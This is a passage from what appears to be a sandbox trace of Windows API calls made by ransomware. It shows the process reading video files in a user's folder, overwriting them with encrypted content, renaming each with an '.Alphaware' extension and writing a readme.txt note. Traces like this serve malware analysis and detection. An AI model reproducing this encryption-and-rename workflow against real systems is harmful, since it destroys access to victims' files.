dwFileAttributes=0x80) returned 1 [0088.822] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\0o6jwd.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\0o6jwd.mp4"), fInfoLevelId=0x0, lpFileInformation=0x2467d78 | out: lpFileInformation=0x2467d78*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xb7756a10, ftCreationTime.dwHighDateTime=0x1d97463, ftLastAccessTime.dwLowDateTime=0x332a2e40, ftLastAccessTime.dwHighDateTime=0x1d9750c, ftLastWriteTime.dwLowDateTime=0x332a2e40, ftLastWriteTime.dwHighDateTime=0x1d9750c, nFileSizeHigh=0x0, nFileSizeLow=0xb472)) returned 1 [0088.822] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\0o6jwd.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\0o6jwd.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0088.822] ReadFile (in: hFile=0x250, lpBuffer=0x2467fc0, nNumberOfBytesToRead=0xb472, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2467fc0*, lpNumberOfBytesRead=0x23ea98*=0xb472, lpOverlapped=0x0) returned 1 [0088.842] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\0o6jwd.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\0o6jwd.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0088.846] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\0o6jwd.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\0o6jwd.mp4"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7756a10, ftCreationTime.dwHighDateTime=0x1d97463, ftLastAccessTime.dwLowDateTime=0x332a2e40, ftLastAccessTime.dwHighDateTime=0x1d9750c, ftLastWriteTime.dwLowDateTime=0x872877e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xf174)) returned 1 [0088.846] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\0o6jwd.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\0o6jwd.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\0o6jwd.mp4.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\0o6jwd.mp4.alphaware")) returned 1 [0088.847] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0088.849] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\8lwQtag2z.swf", dwFileAttributes=0x80) returned 1 [0088.849] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\8lwQtag2z.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\8lwqtag2z.swf"), fInfoLevelId=0x0, lpFileInformation=0x2417770 | out: lpFileInformation=0x2417770*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x8ba9fe80, ftCreationTime.dwHighDateTime=0x1d96f79, ftLastAccessTime.dwLowDateTime=0x999afdc0, ftLastAccessTime.dwHighDateTime=0x1d97026, ftLastWriteTime.dwLowDateTime=0x999afdc0, ftLastWriteTime.dwHighDateTime=0x1d97026, nFileSizeHigh=0x0, nFileSizeLow=0xc842)) returned 1 [0088.849] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\8lwQtag2z.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\8lwqtag2z.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0088.849] ReadFile (in: hFile=0x250, lpBuffer=0x24179d8, nNumberOfBytesToRead=0xc842, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x24179d8*, lpNumberOfBytesRead=0x23ea98*=0xc842, lpOverlapped=0x0) returned 1 [0088.868] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\8lwQtag2z.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\8lwqtag2z.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0088.872] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\8lwQtag2z.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\8lwqtag2z.swf"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ba9fe80, ftCreationTime.dwHighDateTime=0x1d96f79, ftLastAccessTime.dwLowDateTime=0x999afdc0, ftLastAccessTime.dwHighDateTime=0x1d97026, ftLastWriteTime.dwLowDateTime=0x872ad940, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x10be0)) returned 1 [0088.872] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\8lwQtag2z.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\8lwqtag2z.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\8lwQtag2z.swf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\8lwqtag2z.swf.alphaware")) returned 1 [0088.872] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\bC7JKZ.swf", dwFileAttributes=0x80) returned 1 [0088.873] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\bC7JKZ.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\bc7jkz.swf"), fInfoLevelId=0x0, lpFileInformation=0x24c8060 | out: lpFileInformation=0x24c8060*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xd61649a0, ftCreationTime.dwHighDateTime=0x1d972cc, ftLastAccessTime.dwLowDateTime=0xfdc2d8f0, ftLastAccessTime.dwHighDateTime=0x1d972e6, ftLastWriteTime.dwLowDateTime=0xfdc2d8f0, ftLastWriteTime.dwHighDateTime=0x1d972e6, nFileSizeHigh=0x0, nFileSizeLow=0x15999)) returned 1 [0088.873] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\bC7JKZ.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\bc7jkz.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0088.873] ReadFile (in: hFile=0x250, lpBuffer=0x126d8f90, nNumberOfBytesToRead=0x15999, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x126d8f90*, lpNumberOfBytesRead=0x23ea98*=0x15999, lpOverlapped=0x0) returned 1 [0088.893] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\bC7JKZ.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\bc7jkz.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0088.898] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\bC7JKZ.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\bc7jkz.swf"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd61649a0, ftCreationTime.dwHighDateTime=0x1d972cc, ftLastAccessTime.dwLowDateTime=0xfdc2d8f0, ftLastAccessTime.dwHighDateTime=0x1d972e6, ftLastWriteTime.dwLowDateTime=0x872f9c00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1cda0)) returned 1 [0088.898] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\bC7JKZ.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\bc7jkz.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\bC7JKZ.swf.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\bc7jkz.swf.alphaware")) returned 1 [0088.899] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\jlPj6J.flv", dwFileAttributes=0x80) returned 1 [0088.899] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\jlPj6J.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\jlpj6j.flv"), fInfoLevelId=0x0, lpFileInformation=0x2546250 | out: lpFileInformation=0x2546250*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x1b101bf0, ftCreationTime.dwHighDateTime=0x1d969e8, ftLastAccessTime.dwLowDateTime=0xe6a59110, ftLastAccessTime.dwHighDateTime=0x1d97603, ftLastWriteTime.dwLowDateTime=0xe6a59110, ftLastWriteTime.dwHighDateTime=0x1d97603, nFileSizeHigh=0x0, nFileSizeLow=0x4b48)) returned 1 [0088.899] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\jlPj6J.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\jlpj6j.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0088.900] ReadFile (in: hFile=0x250, lpBuffer=0x2546498, nNumberOfBytesToRead=0x4b48, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2546498*, lpNumberOfBytesRead=0x23ea98*=0x4b48, lpOverlapped=0x0) returned 1 [0088.922] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\jlPj6J.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\jlpj6j.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0088.925] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\jlPj6J.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\jlpj6j.flv"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1b101bf0, ftCreationTime.dwHighDateTime=0x1d969e8, ftLastAccessTime.dwLowDateTime=0xe6a59110, ftLastAccessTime.dwHighDateTime=0x1d97603, ftLastWriteTime.dwLowDateTime=0x87345ec0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x6534)) returned 1 [0088.925] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\jlPj6J.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\jlpj6j.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\jlPj6J.flv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\jlpj6j.flv.alphaware")) returned 1 [0088.926] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\MADiRK5BENdO7pHH.flv", dwFileAttributes=0x80) returned 1 [0088.926] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\MADiRK5BENdO7pHH.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\madirk5bendo7phh.flv"), fInfoLevelId=0x0, lpFileInformation=0x2400d20 | out: lpFileInformation=0x2400d20*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xf85af2f0, ftCreationTime.dwHighDateTime=0x1d96c4a, ftLastAccessTime.dwLowDateTime=0x75a36f80, ftLastAccessTime.dwHighDateTime=0x1d97493, ftLastWriteTime.dwLowDateTime=0x75a36f80, ftLastWriteTime.dwHighDateTime=0x1d97493, nFileSizeHigh=0x0, nFileSizeLow=0xdb5)) returned 1 [0088.926] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\MADiRK5BENdO7pHH.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\madirk5bendo7phh.flv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0088.926] ReadFile (in: hFile=0x250, lpBuffer=0x2401d98, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x2401d98*, lpNumberOfBytesRead=0x23ea98*=0xdb5, lpOverlapped=0x0) returned 1 [0088.944] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\MADiRK5BENdO7pHH.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\madirk5bendo7phh.flv"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0088.946] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\MADiRK5BENdO7pHH.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\madirk5bendo7phh.flv"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf85af2f0, ftCreationTime.dwHighDateTime=0x1d96c4a, ftLastAccessTime.dwLowDateTime=0x75a36f80, ftLastAccessTime.dwHighDateTime=0x1d97493, ftLastWriteTime.dwLowDateTime=0x8736c020, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1320)) returned 1 [0088.946] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\MADiRK5BENdO7pHH.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\madirk5bendo7phh.flv"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\MADiRK5BENdO7pHH.flv.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\madirk5bendo7phh.flv.alphaware")) returned 1 [0088.947] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\ptfdx.mp4", dwFileAttributes=0x80) returned 1 [0088.947] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\ptfdx.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\ptfdx.mp4"), fInfoLevelId=0x0, lpFileInformation=0x2489dc0 | out: lpFileInformation=0x2489dc0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5e3bf710, ftCreationTime.dwHighDateTime=0x1d96e1f, ftLastAccessTime.dwLowDateTime=0xc6dcea00, ftLastAccessTime.dwHighDateTime=0x1d970ad, ftLastWriteTime.dwLowDateTime=0xc6dcea00, ftLastWriteTime.dwHighDateTime=0x1d970ad, nFileSizeHigh=0x0, nFileSizeLow=0x10f9f)) returned 1 [0088.947] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\ptfdx.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\ptfdx.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x250 [0088.948] ReadFile (in: hFile=0x250, lpBuffer=0x248a008, nNumberOfBytesToRead=0x10f9f, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x248a008*, lpNumberOfBytesRead=0x23ea98*=0x10f9f, lpOverlapped=0x0) returned 1 [0088.967] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\ptfdx.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\ptfdx.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x250 [0088.976] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.978] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.978] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.978] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.979] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.979] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.979] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.980] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.980] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.980] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.981] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.981] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.981] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.982] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.982] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.982] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.983] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.983] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.983] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.984] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.984] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x23e9f8, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e9f8*=0x1000, lpOverlapped=0x0) returned 1 [0088.984] WriteFile (in: hFile=0x250, lpBuffer=0x2549f20*, nNumberOfBytesToWrite=0xaf4, lpNumberOfBytesWritten=0x23e958, lpOverlapped=0x0 | out: lpBuffer=0x2549f20*, lpNumberOfBytesWritten=0x23e958*=0xaf4, lpOverlapped=0x0) returned 1 [0089.016] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\ptfdx.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\ptfdx.mp4"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5e3bf710, ftCreationTime.dwHighDateTime=0x1d96e1f, ftLastAccessTime.dwLowDateTime=0xc6dcea00, ftLastAccessTime.dwHighDateTime=0x1d970ad, ftLastWriteTime.dwLowDateTime=0x873b82e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x16af4)) returned 1 [0089.016] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\ptfdx.mp4" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\ptfdx.mp4"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\jvuGC2saBZF J\\ptfdx.mp4.Alphaware" (normalized: "c:\\users\\keecfmwgj\\videos\\jvugc2sabzf j\\ptfdx.mp4.alphaware")) returned 1 [0089.018] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa07d4070, ftCreationTime.dwHighDateTime=0x1d96efb, ftLastAccessTime.dwLowDateTime=0x8742a700, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8742a700, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0089.018] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7756a10, ftCreationTime.dwHighDateTime=0x1d97463, ftLastAccessTime.dwLowDateTime=0x332a2e40, ftLastAccessTime.dwHighDateTime=0x1d9750c, ftLastWriteTime.dwLowDateTime=0x872877e0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xf174, dwReserved0=0x0, dwReserved1=0x0, cFileName="0o6jwd.mp4.Alphaware", cAlternateFileName="0O6JWD~1.ALP")) returned 1 [0089.018] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xb41a2eb0, ftCreationTime.dwHighDateTime=0x1d974f3, ftLastAccessTime.dwLowDateTime=0x1259f070, ftLastAccessTime.dwHighDateTime=0x1d97583, ftLastWriteTime.dwLowDateTime=0x1259f070, ftLastWriteTime.dwHighDateTime=0x1d97583, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="4_p930HVcZ_", cAlternateFileName="4_P930~1")) returned 1 [0089.018] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8ba9fe80, ftCreationTime.dwHighDateTime=0x1d96f79, ftLastAccessTime.dwLowDateTime=0x999afdc0, ftLastAccessTime.dwHighDateTime=0x1d97026, ftLastWriteTime.dwLowDateTime=0x872ad940, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x10be0, dwReserved0=0x0, dwReserved1=0x0, cFileName="8lwQtag2z.swf.Alphaware", cAlternateFileName="8LWQTA~1.ALP")) returned 1 [0089.018] FindNextFileW (in: hFindFile=0xd8a310, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd61649a0, ftCreationTime.dwHighDateTime=0x1d972cc, ftLastAccessTime.dwLowDateTime=0xfdc2d8f0, ftLastAccessTime.dwHighDateTime=0x1d972e6, ftLastWriteTime.dwLowDateTime=0x872f9c00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1cda0, dwReserved0=0x0, dwReserved1=0x0, 